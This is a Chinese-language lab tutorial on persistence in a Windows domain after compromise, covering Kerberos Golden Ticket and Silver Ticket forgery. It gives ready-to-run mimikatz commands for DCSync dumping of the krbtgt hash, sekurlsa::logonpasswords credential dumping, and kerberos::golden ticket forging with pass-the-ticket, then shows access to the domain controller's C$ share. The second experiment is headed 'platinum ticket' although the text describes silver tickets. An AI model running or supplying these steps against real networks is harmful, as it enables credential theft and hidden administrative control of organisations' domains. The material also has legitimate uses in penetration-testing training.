域权限维持——黄金票据和白金票据

获得域控得用户密码时，为了防止密码被改，需要进行权限维持

实验一：黄金票据

实验原理：ms14068的漏洞原理是伪造域管的tgt，而黄金票据的漏洞原理是伪造krbtgt用户的票据，krbtgt用户是域控中用来管理发放票据的用户，拥有了该用户的权限，就可以伪造系统中的任意用户

实验条件：

1.域名称 
2.域的SID 值
3.域的KRBTGT账户NTLM密码哈希或者aes-256值
4.伪造用户名

实验步骤：

1.获取域名称

whoami
或net time /domain

  

2.获取域的sid值

whoami /all

  

3.获取域的KRBTGT账户NTLM密码哈希或者aes-256值，具体方法见：https://blog.csdn.net/cxrpty/article/details/105208831

lsadump::dcsync /domain:zz.com /user:krbtgt /csv

  

4.清楚所有票据

klist purge

  

5.使用mimikatz伪造指定用户的票据并注入到内存

kerberos::golden  /admin:administrator  /domain:zz.com  /sid:S-1-5-21-1373374443-4003574425-2823219550  /krbtgt:9f3af6256e86408cb31169871fb36e60  /ptt

  

6.查看票据

  

7.查看域控信息

dir \\WIN-8\c$

  

实验二：白金票据

实验原理：白银票据与ms14068和黄金票据的原理不太一样，ms14068和黄金票据都是伪造tgt（门票发放票），而白银票据则是伪造st（门票），这样的好处是门票不会经过kdc，从而更加隐蔽，但是伪造的门票只对部分服务起作用,如cifs（文件共享服务），mssql，winrm（windows远程管理），dns等等

实验要求：

1.域名
2.域sid
3.目标服务器FQDN
4.可利用的服务
5.服务账号的NTML HASH 
6.需要伪造的用户名

实验步骤：

1.获取域名及目标服务器名，方法同上

  

2.获取域id，方法同上

  

3.利用文件共享服务cifs，获取服务账号得NTMLhash值(在14068基础上使用mimikatz获取)

注意：服务账号就是域控名$

mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> 2.txt

  

4.查看域中的所有用户

  

5.清理所有票据

  

7.利用mimikatz对指定用户进行票据伪装并注入内存

kerberos::golden /domain:域名 /sid:填sid /target:完整的域控名 /service:cifs /rc4:服务账号NTMLHASH /user:用户名 /ptt

  

8.查看域控信息

dir \\WIN-8\c$